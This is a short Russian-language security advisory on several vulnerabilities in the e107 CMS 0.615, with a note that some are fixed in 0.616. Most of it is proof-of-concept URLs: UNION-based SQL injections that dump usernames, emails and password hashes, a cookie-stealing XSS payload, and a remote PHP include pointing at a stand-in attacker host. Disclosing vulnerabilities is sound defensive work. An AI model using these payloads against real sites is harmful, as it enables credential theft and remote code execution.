Множественные уязвимости в e107

Описание: Несколько уязвимостей обнаружена в e107. Удаленный пользователь может выполнить SQL команды и выполнить XSS нападение. В некоторых случаях, удаленный пользователь может выполнить произвольный PGP код на целевой системе. Также удаленный пользователь может раскрыть инсталляционный путь.

1. SQl инъекция:

http://localhost/e107_0615/content.php?content.99/* */UNION/**/SELECT/**/null,null,null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,
null,null,null/**/FROM/**/e107_user/**/ WHERE/**/user_id=1/*

http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null,null,null,null,null,
null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/nul l,null,
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,
null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

http://localhost/e107_0615/e107_plugins/clock_menu/clock _menu.php?clock_flat=1&LAN_407=foo%22);
//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]

3. PHP include:

 http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://[attacker]/evil.php

http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugin s/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php

http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php 

URL производителя:http://www.e107.org/

Решение:Некоторые уязвимости устранены в 0.616.